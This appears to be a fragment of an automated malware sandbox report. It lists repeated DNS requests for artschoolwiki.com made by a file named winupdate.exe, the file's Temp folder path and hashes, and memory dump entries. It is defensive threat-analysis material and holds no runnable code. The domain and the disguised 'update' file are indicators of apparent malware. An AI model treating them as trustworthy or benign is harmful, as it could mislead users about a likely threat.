    21.236.111.52.in-addr.arpa

  • 8.8.8.8:53
    artschoolwiki.com
    dns
    winupdate.exe
    63 B
    136 B
    1
    1

    DNS Request

    artschoolwiki.com

  • 8.8.8.8:53
    artschoolwiki.com
    dns
    winupdate.exe
    63 B
    136 B
    1
    1

    DNS Request

    artschoolwiki.com

  • 8.8.8.8:53
    artschoolwiki.com
    dns
    winupdate.exe
    63 B
    136 B
    1
    1

    DNS Request

    artschoolwiki.com

  • 8.8.8.8:53
    artschoolwiki.com
    dns
    winupdate.exe
    63 B
    136 B
    1
    1

    DNS Request

    artschoolwiki.com

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\winupdate.exe

    Filesize

    61KB

    MD5

    735eb6514d76b7cc638a3c77a2325f85

    SHA1

    bcb05156b1fe98070a69a375a8b76f1c6df69241

    SHA256

    1310165efd055be367fd5372ab0cfe8955d00c6d083cee17788b5fa27ec4a1e1

    SHA512

    ec6f85aa4e462e42660d860026680650fef2598ff0caef7cabc738b7f077914f33f2a4e7c63cddddb9d38f48a2a381574f3cd9e2c04dc211230e6b4c24f2230d

  • memory/832-11-0x0000000000500000-0x0000000000512000-memory.dmp

    Filesize

    72KB

  • memory/3092-0-0x0000000000500000-0x0000000000512000-memory.dmp

    Filesize

    72KB

  • memory/3092-1-0x0000000000501000-0x0000000000502000-memory.dmp

    Filesize

    4KB

  • memory/3092-10-0x0000000000500000-0x0000000000512000-memory.dmp

    Filesize

    72KB